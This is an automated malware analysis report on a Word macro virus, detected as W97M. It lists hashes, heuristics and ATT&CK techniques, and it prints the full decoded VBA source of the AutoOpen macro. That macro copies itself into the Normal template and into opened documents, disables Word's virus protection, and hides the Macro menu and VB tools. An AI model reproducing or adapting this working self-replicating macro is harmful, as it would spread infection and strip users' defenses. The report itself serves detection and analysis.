Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 df7cfec859d7fb36…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 43.0 KB
Created: 2001-03-02 10:57:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: d4993d25d15a9ea682f5d6cf688f91af
SHA-1: 441714920cb11a357ff3c9e0ee2848dfc260b901
SHA-256: df7cfec859d7fb3693ecda721af2c60dfc58b78f3d4ac2ed7beaf54a37cab4e9
Risk score: 140

Malware Insights

MITRE ATT&CK:
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is a malicious Word document containing a VBA macro. The AutoOpen macro is designed to copy itself to the Normal template and the active document, indicating an attempt to establish persistence. The presence of legacy WordBasic auto-exec markers and the detection as Win.Trojan.W97M-13 further support its malicious nature. The macro's logic suggests it aims to ensure its execution across multiple documents.

Heuristics (4)

  • ClamAV: Win.Trojan.W97M-13 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W97M-13
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    Document contains an AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10774 bytes
SHA-256: 94344e13cb3de5c6a21256f4f445bba7853b122243efa07afd88dcc3b96e1420

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Option Explicit

Public Sub MAIN()

Dim MyFile$
Dim OkExist
Dim TemplateName$
Dim internal
Dim xItem
Dim t
Dim s

' Set the error trap
On Error Resume Next

' Get the active document's file name
If ActiveDocument.Path = "" Then
  MyFile$ = ActiveDocument.Name
Else
  MyFile$ = ActiveDocument.Path + "\" + ActiveDocument.Name
End If

If MyFile$ = "" Then GoTo Bye

' Show date/time information on the hour
t = Format(Time, "hhmmss")
If Mid(t, 3, 2) = "00" And Not (Format(Date, "yyyy") = "1998" And Val(Format(Date, "mm")) < 9) Then
  MsgBox s, vbSystemModal, "CPSDI"
  'MsgBox Format(Date, "dddd,yyyy mmm dd") + "日 " + Format(Time, "hh") + "时", vbSystemModal, "我的提醒"   ' (commented-out variant: date + "day", hour + "hour", titled "My reminder")
End If


' Check whether the Normal template already contains an AutoOpen macro
OkExist = 0
For Each xItem In NormalTemplate.VBProject.VBComponents
  If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
    OkExist = 1
    Exit For
  End If
Next xItem

' Get the Normal template's file name
TemplateName$ = NormalTemplate.Path + "\" + NormalTemplate.Name

' Reset the Normal template's file attributes and disable Word's virus protection
SetAttr TemplateName$, vbNormal
Options.VirusProtection = False

' Copy the AutoOpen macro into the Normal template
If OkExist <> 1 Then
    Application.OrganizerCopy Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If

' Check whether the active document already contains an AutoOpen macro
OkExist = 0
For Each xItem In ActiveDocument.VBProject.VBComponents
  If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
    OkExist = 1
    Exit For
  End If
Next xItem

' Copy the AutoOpen macro into the active document
If OkExist <> 1 Then
    Application.OrganizerCopy Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If

Bye:

' Set a timer that re-runs the AutoOpen macro automatically
internal = "00:" + Str(10 - Val(Mid(t, 4, 1)))
Application.OnTime When:=Now + TimeValue(internal) - TimeValue("00:00:" + Right(t, 2)), Name:="AutoOpen", Tolerance:=60
DisableMacroMenu
DisableVBTools
End Sub
Public Sub DisableMacroMenu()
' Disable the Macro command group in the Tools menu
Dim cb, xItem, xxItem, xxxItem
For Each cb In ActiveDocument.CommandBars
  If cb.Name = "Menu Bar" Then
    For Each xItem In cb.Controls
      If xItem.Caption = "工具(&T)" Then   ' caption of "Tools(&T)" in the Chinese Word UI
        For Each xxItem In xItem.Controls
          If xxItem.Caption = "宏(&M)" Then   ' caption of "Macro(&M)" in the Chinese Word UI
            'xxItem.Enabled = True
            For Each xxxItem In xxItem.Controls
                xxxItem.Enabled = False
            Next xxxItem
            Exit Sub
          End If
        Next xxItem
      End If
    Next xItem
  End If
Next cb
End Sub
Public Sub DisableVBTools()
' Disable the Visual Basic toolbar
Dim cb
For Each cb In ActiveDocument.CommandBars
  If cb.Name = "Visual Basic" Then
     cb.Enabled = False
     Exit For
  End If
Next cb
End Sub


' Processing file: /opt/analyzer/scan_staging/05b1c6f8ddb44920a0c5b4a8c4ce4401.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1182 bytes
' Macros/VBA/AutoOpen - 5780 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' Line #2:
' 	FuncDefn (Public Sub MAIN())
' Line #3:
' Line #4:
' 	Dim 
' 	VarDefn MyFile
' Line #5:
' 	Dim 
' 	VarDefn OkExist
' Line #6:
' 	Dim 
' 	VarDefn TemplateName
' Line #7:
' 	Dim 
' 	VarDefn internal
' Line #8:
' 	Dim 
' 	VarDefn xItem
' Line #9:
' 	Dim 
' 	VarDefn t
' Line #10:
' 	Dim 
' 	VarDefn s
' Line #11:
' Line #12:
' 	QuoteRem 0x0000 0x000C "设置错误陷阱"
' Line #13:
' 	OnError (Resume Next) 
' Line #14:
' Line #15:
' 	QuoteRem 0x0000 0x000E "获取活动文件名"
' Line #16:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #17:
' 	Ld ActiveDocument 
' 	MemLd New 
' 	St MyFile$ 
' Line #18:
' 	ElseBlock 
' Line #19:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x0001 "\"
' 	Add 
' 	Ld ActiveDocument 
' 	MemLd New 
' 	Add 
' 	St MyFile$ 
' Line #20:
' 	EndIfBlock 
' Line #21:
' Line #22:
' 	Ld MyFile$ 
' 	LitStr 0x0000
... (truncated)